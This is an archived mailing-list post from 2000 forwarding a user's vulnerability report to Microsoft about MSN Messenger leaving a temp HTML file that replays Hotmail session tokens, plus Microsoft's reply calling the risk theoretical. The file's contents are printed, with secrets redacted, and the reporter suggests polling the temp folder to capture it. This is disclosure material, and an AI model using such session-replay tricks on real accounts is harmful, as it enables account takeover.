[Fwd: RE: security in MSN messenger service [MSRC 180]]

[John () BRAHY COM (John Brahy)]

Well, secure () microsoft com seems to think that this vulnerability is
completely theoretical.
I think that Microsoft security is completely theoretical, but everyone
is entitled to
their opinion.

John
-------- Original Message --------
Subject: RE: security in MSN messenger service [MSRC 180]
   Date: Mon, 17 Apr 2000 11:13:32 -0700
   From: Microsoft Security Response Center <secure () microsoft com>
     To: "'John Brahy'" <John () brahy com>

Hi John -

Thanks for your note.  We've investigated the report that you sent, and
I wanted to get back in touch to let you know what we found out.  You're
right that the file could be used to effect a logon to Hotmail.
However, it's only written to the machine after you've already provided
bona fide logon credentials, and it's deleted within seconds of being
written to the machine.  In addition, it doesn't contain any plaintext
passwords or other authentication information.  So, the potential
exposure here would be from a case in which an user could (a) get you to
log onto Hotmail or MSN Messenger, (b) get you to leave your computer
unattended and (c) do this with exactly the right timing in order to
copy the file during the very short period that it exists.  However, if
a malicious user has physical access to your machine, he already has de
facto control over it -- he could, for instance, simply install software
to display a bogus Hotmail logon screen and collect your password that
way.

I hope that helps answer the question.  If we've missed something,
please let me know, as we'd be happy to continue looking into the
issue.  Regards,

Secure () microsoft com

-----Original Message-----
From: John Brahy [mailto:John () Brahy com]
Sent: Saturday, April 15, 2000 3:43 PM
To: Microsoft Security Response Center
Subject: security in MSN messenger service

I have noticed that when I check email from the MSN Messenger.
MSN Messenger writes a temp file in C:\windows\temp\sfd4080.htm.
The contents of that file are below. What I have found is that if that
file is saved, you can use it as a redirect to hotmail without using a
password. I wonder what a "while true" loop looking in c:\windows\temp\
would be able to capture? Session seems to time out around 5 minutes.
When that happens, the "creds" value changes but not the auth.

------------START-OF-HTML----------------------
<html>
<head>
<noscript>
<meta http-equiv=Refresh content="0; url=http://www.hotmail.com";>
</noscript>
</head>
<body onload="document.pform.submit(); ">
<form name="pform"
action="http://www.hotmail.msn.com/ppsecure/domessengerlogin";
method="POST">
<input type="hidden" name="mode" value="ttl">
<input type="hidden" name="login" value="jbrahy">
<input type="hidden" name="username" value="jbrahy () hotmail com">
<input type="hidden" name="sid" value="507">
<input type="hidden" name="kv" value="2">
<input type="hidden" name="id" value="2">
<input type="hidden" name="sl" value="7313">
<input type="hidden" name="rru" value="/cgi-bin/HoTMaiL">
<input type="hidden" name="auth" value="(58 characters)">
<input type="hidden" name="creds" value="(32 characters)">
<input type="hidden" name="svc" value="mail">
<input type="hidden" name="js" value="yes">
</form>
</body>
</html>
------------END-OF-HTML----------------------